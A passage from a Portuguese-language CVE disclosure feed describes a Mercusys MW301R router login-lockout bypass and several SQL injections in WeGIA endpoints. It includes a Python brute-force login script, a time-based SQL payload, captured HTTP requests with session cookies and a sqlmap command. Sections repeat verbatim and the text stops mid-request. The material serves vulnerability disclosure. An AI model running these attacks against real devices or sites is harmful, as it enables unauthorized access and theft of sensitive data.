</h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7882" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7882</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">O roteador Mercusys MW301R implementa um mecanismo básico de proteção contra força bruta que bloqueia tentativas de login após um certo número de tentativas de login. Tentativas com falha. No entanto, esse mecanismo de bloqueio se baseia exclusivamente no endereço IP de origem, sem impor nenhuma impressão digital de sessão, validação de token ou limitação avançada de taxa e endereço MAC, etc.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;"></p>Um invasor conectado à LAN pode simplesmente alterar seu endereço IP local (por exemplo, de 192.168.1.10 para 192.168.1.11) após atingir o limite, zerando efetivamente o contador de tentativas de login.</br> Isso permite que um ataque de força bruta seja realizado contra a página de login do administrador, anulando completamente o mecanismo de segurança pretendido. <p style="text-align: justify;"> <ol> <li> Conecte-se à mesma rede local que o roteador (gateway padrão: <code>192.168.1.1</code>) para preparar o ambiente de ataque. </li> <li> Inicie tentativas de login de força bruta enviando solicitações com valores de senha diferentes. Após algumas falhas, o roteador bloqueará novas tentativas a partir desse endereço IP. </li> <li> Para contornar o bloqueio, altere o endereço IP do seu dispositivo para outro dentro da faixa permitida e continue o processo de força bruta a partir do novo IP. </li> <li> Repita este processo — sempre que seu IP for bloqueado, alterne para outro IP entre <code>192.168.1.4</code> e <code>192.168.1.254</code> e retome o ataque. </li> </ol> </p> <h2 id="código-do-exploit">Código do Exploit: </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">time</span> <span class="kn">from</span> <span class="nn">playwright.sync_api</span> <span class="kn">import</span> <span class="n">Playwright</span><span class="p">,</span> <span class="n">sync_playwright</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">carrega_senhas</span><span class="p">(</span><span class="n">caminho_arquivo</span><span class="p">:</span> <span class="nb">str</span><span class="p">)</span> <span class="o">-></span> <span class="nb">list</span><span class="p">[</span><span class="nb">str</span><span class="p">]:</span> <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">caminho_arquivo</span><span class="p">,</span> <span class="s2">"r"</span><span class="p">,</span> <span class="n">encoding</span><span class="o">=</span><span class="s2">"utf-8"</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span> <span class="k">return</span> <span class="p">[</span><span class="n">linha</span><span class="o">.</span><span class="n">strip</span><span class="p">()</span> <span class="k">for</span> <span class="n">linha</span> <span class="ow">in</span> <span class="n">f</span> <span class="k">if</span> <span class="n">linha</span><span class="o">.</span><span class="n">strip</span><span class="p">()]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">tenta_login</span><span class="p">(</span><span class="n">page</span><span class="p">,</span> <span class="n">senha</span><span class="p">:</span> <span class="nb">str</span><span class="p">)</span> <span class="o">-></span> <span class="nb">bool</span><span class="p">:</span> <span class="n">page</span><span class="o">.</span><span class="n">goto</span><span class="p">(</span><span class="s2">"http://192.168.1.1/"</span><span class="p">)</span> <span class="n">page</span><span class="o">.</span><span class="n">get_by_role</span><span class="p">(</span><span class="s2">"textbox"</span><span class="p">,</span> <span class="n">name</span><span class="o">=</span><span class="s2">"Senha de Login"</span><span class="p">)</span><span class="o">.</span><span class="n">fill</span><span class="p">(</span><span class="n">senha</span><span class="p">)</span> <span class="n">page</span><span class="o">.</span><span class="n">get_by_role</span><span class="p">(</span><span class="s2">"textbox"</span><span class="p">,</span> <span class="n">name</span><span class="o">=</span><span class="s2">"Senha de Login"</span><span class="p">)</span><span class="o">.</span><span class="n">press</span><span class="p">(</span><span class="s2">"Enter"</span><span class="p">)</span> <span class="n">time</span><span class="o">.</span><span class="n">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="k">try</span><span class="p">:</span> <span class="n">page</span><span class="o">.</span><span class="n">get_by_text</span><span class="p">(</span><span class="s2">"Avançado"</span><span class="p">,</span> <span class="n">exact</span><span class="o">=</span><span class="kc">True</span><span class="p">,</span> <span class="n">timeout</span><span class="o">=</span><span class="mi">2000</span><span class="p">)</span> <span class="k">return</span> <span class="kc">True</span> <span class="k">except</span><span class="p">:</span> <span class="k">return</span> <span class="kc">False</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">run</span><span class="p">(</span><span class="n">playwright</span><span class="p">:</span> <span class="n">Playwright</span><span class="p">)</span> <span class="o">-></span> <span class="kc">None</span><span class="p">:</span> <span class="n">browser</span> <span class="o">=</span> <span class="n">playwright</span><span class="o">.</span><span class="n">chromium</span><span class="o">.</span><span class="n">launch</span><span class="p">(</span><span class="n">headless</span><span class="o">=</span><span class="kc">False</span><span class="p">)</span> <span class="n">context</span> <span class="o">=</span> <span class="n">browser</span><span class="o">.</span><span class="n">new_context</span><span class="p">()</span> <span class="n">page</span> <span class="o">=</span> <span class="n">context</span><span class="o">.</span><span class="n">new_page</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">senhas</span> <span class="o">=</span> <span class="n">carrega_senhas</span><span class="p">(</span><span class="s2">"senhas.txt"</span><span class="p">,</span> <span class="s2">""</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="k">for</span> <span class="n">idx</span><span class="p">,</span> <span class="n">senha</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="n">senhas</span><span class="p">,</span> <span class="mi">1</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">"[</span><span class="si">{</span><span class="n">idx</span><span class="si">}</span><span class="s2">/</span><span class="si">{</span><span class="nb">len</span><span class="p">(</span><span class="n">senhas</span><span class="p">)</span><span class="si">}</span><span class="s2">] Testando senha: </span><span class="si">{</span><span class="n">senha</span><span class="si">!r}</span><span class="s2">"</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">tenta_login</span><span class="p">(</span><span class="n">page</span><span class="p">,</span> <span class="n">senha</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">">>> Sucesso! Senha encontrada: </span><span class="si">{</span><span class="n">senha</span><span class="si">!r}</span><span class="s2">"</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">page</span><span class="o">.</span><span class="n">get_by_text</span><span class="p">(</span><span class="s2">"Avançado"</span><span class="p">,</span> <span class="n">exact</span><span class="o">=</span><span class="kc">True</span><span class="p">)</span><span class="o">.</span><span class="n">click</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="k">break</span> </span></span><span class="line"><span class="cl"><span class="k">else</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="s2">"Nenhuma senha funcionou."</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">close</span><span class="p">()</span> </span></span><span class="line"><span class="cl"><span class="n">browser</span><span class="o">.</span><span class="n">close</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="n">name</span> <span class="o">==</span> <span class="s2">"main"</span><span class="p">:</span> <span class="k">with</span> <span class="n">sync_playwright</span><span class="p">()</span> <span class="k">as</span> <span class="n">playwright</span><span class="p">:</span> <span class="n">run</span><span class="p">(</span><span class="n">playwright</span><span class="p">)</span> <span class="n">r</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="poc">PoC </h2><p><img src="/p/cve-2025-7882/image.png" width="1878" height="950" srcset="/p/cve-2025-7882/image_hu_91b4360fd68a28ba.png 480w, /p/cve-2025-7882/image_hu_d141f112b09e10d2.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="197" data-flex-basis="474px" /></p> <p><img src="/p/cve-2025-7882/image-1.png" width="1889" height="1016" srcset="/p/cve-2025-7882/image-1_hu_2f38919172f7d0b7.png 480w, /p/cve-2025-7882/image-1_hu_268f297aff1b93f7.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="185" data-flex-basis="446px" /></p> <p><img src="/p/cve-2025-7882/image-2.png" width="489" height="534" srcset="/p/cve-2025-7882/image-2_hu_e9f740f724ca4e72.png 480w, /p/cve-2025-7882/image-2_hu_44ca76c3433fa5cf.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="91" data-flex-basis="219px" /></p> <p><img src="/p/cve-2025-7882/image-3.png" width="442" height="542" srcset="/p/cve-2025-7882/image-3_hu_b2613553a6c02900.png 480w, /p/cve-2025-7882/image-3_hu_9d0794b8a52b243e.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="81" data-flex-basis="195px" /></p> <p><img src="/p/cve-2025-7882/image-4.png" width="1830" height="933" srcset="/p/cve-2025-7882/image-4_hu_89b33ba6038c9b72.png 480w, /p/cve-2025-7882/image-4_hu_9581ddd2580c03c9.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="196" data-flex-basis="470px" /></p> <h3 id="video-poc">Video PoC </h3><p><a class="link" href="https://youtu.be/_t3ZC8zU4-A" target="_blank" rel="noopener" >https://youtu.be/_t3ZC8zU4-A</a></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;">A falta de validação de sessão neste endpoint pode levar a vários riscos de segurança:</p> <p style="text-align: justify;"> <ul> <li><b>Exposição de Dados Não Autorizada:</b> Usuários não autenticados podem enumerar ou recuperar dados internos confidenciais.</li> <li><b>Escalonamento de Privilégios:</b> Invasores podem acessar ou inferir informações destinadas apenas a usuários autorizados.</li> <li><b>Divulgação de Informações:</b> Lógica de negócios e IDs internos (como funções ou permissões de usuário) podem ser vazados.</li> <li><b>Suporte de Reconhecimento:</b> Facilita o mapeamento de estruturas de backend para ataques mais direcionados.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7882.md" target="_blank" rel="noopener" >https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7882.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://github.com/%20%20www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/raul50x50.png" loading="lazy" /></a> <a class="link" href="https://github.com/%20%20www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" >Raul Pazemécxas</a></p> <blockquote> <p><em>Por: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Sun, 20 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-53946/ https://www.cvehunters.com/pt/p/cve-2025-53946/ <h2 id="cve-2025-53946-vulnerabilidade-de-injeção-sql-no-parâmetro-id_fichamedica-do-endpoint-profile_pacientephp">CVE-2025-53946: Vulnerabilidade de Injeção SQL no parâmetro <code>id_fichamedica</code> do Endpoint <code>profile_paciente.php</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53946" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53946</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro <code>id_fichamedica</code> do endpoint <code>/html/saude/profile_paciente.php</code>. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro <code>id_fichamedica</code>. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.</p><h2 id="cve-2025-53946-vulnerabilidade-de-injeção-sql-no-parâmetro-id_fichamedica-do-endpoint-profile_pacientephp">CVE-2025-53946: Vulnerabilidade de Injeção SQL no parâmetro <code>id_fichamedica</code> do Endpoint <code>profile_paciente.php</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53946" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53946</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro <code>id_fichamedica</code> do endpoint <code>/html/saude/profile_paciente.php</code>. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro <code>id_fichamedica</code>. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.</p> <h2 id="poc">PoC </h2><p>Endpoint Vulnerável: <code>/html/saude/profile_paciente.php</code></p> <p>Parâmetro: <code>id_fichamedica</code></p> <h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> 1+AND+SLEEP(10) </span></span></code></pre></td></tr></table> </div> </div><h3 id="exploração-manual">Exploração Manual: </h3><p><img src="/p/cve-2025-53946/image.png" width="1280" height="602" srcset="/p/cve-2025-53946/image_hu_446a5f0aca967603.png 480w, /p/cve-2025-53946/image_hu_88f973a4b4b6d596.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="212" data-flex-basis="510px" /></p> <p><img src="/p/cve-2025-53946/image-1.png" width="1280" height="588" srcset="/p/cve-2025-53946/image-1_hu_10a28eb522607c.png 480w, /p/cve-2025-53946/image-1_hu_2b701927703256a7.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="217" data-flex-basis="522px" /></p> <h3 id="sqlmap">Sqlmap: </h3><p><img src="/p/cve-2025-53946/image-2.png" width="859" height="660" srcset="/p/cve-2025-53946/image-2_hu_d8d1038b65332cf7.png 480w, /p/cve-2025-53946/image-2_hu_144f09ecde05299.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="130" data-flex-basis="312px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).</li> <li>Enumeração de banco de dados (esquemas, tabelas, usuários, versões).</li> <li>Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).</li> <li>Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.</li> <li>Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-532r-mgxv-g7jm" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-532r-mgxv-g7jm</a></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <h2 id="colaborador">Colaborador </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Thu, 17 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-54058/ https://www.cvehunters.com/pt/p/cve-2025-54058/ <h2 id="cve-2025-54058-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-idatendido_familiares-do-endpoint-dependente_editarenderecophp">CVE-2025-54058: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro <code>idatendido_familiares</code> do Endpoint <code>dependente_editarEndereco.php</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-54058" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-54058</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro <code>idatendido_familiares</code> do endpoint <code>/html/funcionario/dependente_editarEndereco.php</code>. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro <code>idatendido_familiares</code>. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.</p><h2 id="cve-2025-54058-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-idatendido_familiares-do-endpoint-dependente_editarenderecophp">CVE-2025-54058: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro <code>idatendido_familiares</code> do Endpoint <code>dependente_editarEndereco.php</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-54058" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-54058</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro <code>idatendido_familiares</code> do endpoint <code>/html/funcionario/dependente_editarEndereco.php</code>. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro <code>idatendido_familiares</code>. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.</p> <h2 id="poc">PoC </h2><p>Endpoint Vulnerável: <code>/html/funcionario/dependente_editarEndereco.php</code></p> <p>Parâmetro: <code>idatendido_familiares</code></p> <p style="text-align: justify;">Salve a requisição no arquivo <code>req.txt</code>:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> POST /html/funcionario/dependente_editarEndereco.php?id_pessoa=3&idatendido_familiares=1 HTTP/1.1 </span></span><span class="line"><span class="cl"> Host: demo.wegia.org </span></span><span class="line"><span class="cl"> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl"> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 </span></span><span class="line"><span class="cl"> Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl"> Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl"> Content-Type: application/x-www-form-urlencoded </span></span><span class="line"><span class="cl"> Content-Length: 125 </span></span><span class="line"><span class="cl"> Origin: https://demo.wegia.org </span></span><span class="line"><span class="cl"> Connection: keep-alive </span></span><span class="line"><span class="cl"> Referer: https://demo.wegia.org/html/funcionario/profile_dependente.php?id_dependente=1 </span></span><span class="line"><span class="cl"> Cookie: _ga_F8DXBXLV8J=GS2.1.s1751259204$o23$g1$t1751262251$j60$l0$h0; _ga=GA1.1.424189364.1749063834; PHPSESSID=ogoa4lr4nrqqudih73o8oj76p1 </span></span><span class="line"><span class="cl"> Upgrade-Insecure-Requests: 1 </span></span><span class="line"><span class="cl"> Sec-Fetch-Dest: document </span></span><span class="line"><span class="cl"> Sec-Fetch-Mode: navigate </span></span><span class="line"><span class="cl"> Sec-Fetch-Site: same-origin </span></span><span class="line"><span class="cl"> Sec-Fetch-User: ?1 </span></span><span class="line"><span class="cl"> Priority: u=0, i </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> cep=52011-040&uf=PE&cidade=Recife&bairro=Gra%C3%A7as&rua=Avenida+Rui+Barbosa&numero_residencia=12&complemento=12&ibge=2611606 </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;">Então, use o <code>sqlmap</code>:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> sqlmap -r req.txt -p idatendido_familiares --risk=3 --level=5 --dbs --batch --dbms=mysql --batch </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-54058/image.png" width="864" height="755" srcset="/p/cve-2025-54058/image_hu_464b5ea2f7936886.png 480w, /p/cve-2025-54058/image_hu_4782a5da1e37635e.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="114" data-flex-basis="274px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).</li> <li>Enumeração de banco de dados (esquemas, tabelas, usuários, versões).</li> <li>Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).</li> <li>Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.</li> <li>Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-5pwp-39jc-wxj8" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-5pwp-39jc-wxj8</a></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <h2 id="colaborador">Colaborador </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Thu, 17 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-54060/ https://www.cvehunters.com/pt/p/cve-2025-54060/ <h2 id="cve-2025-54060-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-idatendido_familiares-do-endpoint-dependente_editarinfopessoalphp">CVE-2025-54060: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro <code>idatendido_familiares</code> do Endpoint <code>dependente_editarInfoPessoal.php</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-54060" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-54060</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro <code>idatendido_familiares</code> do endpoint <code>/html/funcionario/dependente_editarInfoPessoal.php</code>. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro <code>idatendido_familiares</code>. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.</p><h2 id="cve-2025-54060-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-idatendido_familiares-do-endpoint-dependente_editarinfopessoalphp">CVE-2025-54060: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro <code>idatendido_familiares</code> do Endpoint <code>dependente_editarInfoPessoal.php</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-54060" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-54060</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro <code>idatendido_familiares</code> do endpoint <code>/html/funcionario/dependente_editarInfoPessoal.php</code>. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro <code>idatendido_familiares</code>. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.</p> <h2 id="poc">PoC </h2><p>Endpoint Vulnerável: <code>/html/funcionario/dependente_editarInfoPessoal.php</code></p> <p>Parâmetro: <code>idatendido_familiares</code></p> <p style="text-align: justify;">Salve a requisição no arquivo <code>req.txt</code>:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> POST /html/funcionario/dependente_editarInfoPessoal.php?id_pessoa=3&idatendido_familiares=1+AND+7539=7538 HTTP/1.1 </span></span><span class="line"><span class="cl"> Host: demo.wegia.org </span></span><span class="line"><span class="cl"> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl"> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 </span></span><span class="line"><span class="cl"> Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl"> Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl"> Content-Type: application/x-www-form-urlencoded </span></span><span class="line"><span class="cl"> Content-Length: 119 </span></span><span class="line"><span class="cl"> Origin: https://demo.wegia.org </span></span><span class="line"><span class="cl"> Connection: keep-alive </span></span><span class="line"><span class="cl"> Referer: https://demo.wegia.org/html/funcionario/profile_dependente.php?id_dependente=1 </span></span><span class="line"><span class="cl"> Cookie: _ga_F8DXBXLV8J=GS2.1.s1751254790$o22$g1$t1751255920$j46$l0$h0; _ga=GA1.1.424189364.1749063834; PHPSESSID=bv1jv0i5nijrv1a3dkkimbp270 </span></span><span class="line"><span class="cl"> Upgrade-Insecure-Requests: 1 </span></span><span class="line"><span class="cl"> Sec-Fetch-Dest: document </span></span><span class="line"><span class="cl"> Sec-Fetch-Mode: navigate </span></span><span class="line"><span class="cl"> Sec-Fetch-Site: same-origin </span></span><span class="line"><span class="cl"> Sec-Fetch-User: ?1 </span></span><span class="line"><span class="cl"> Priority: u=0, i 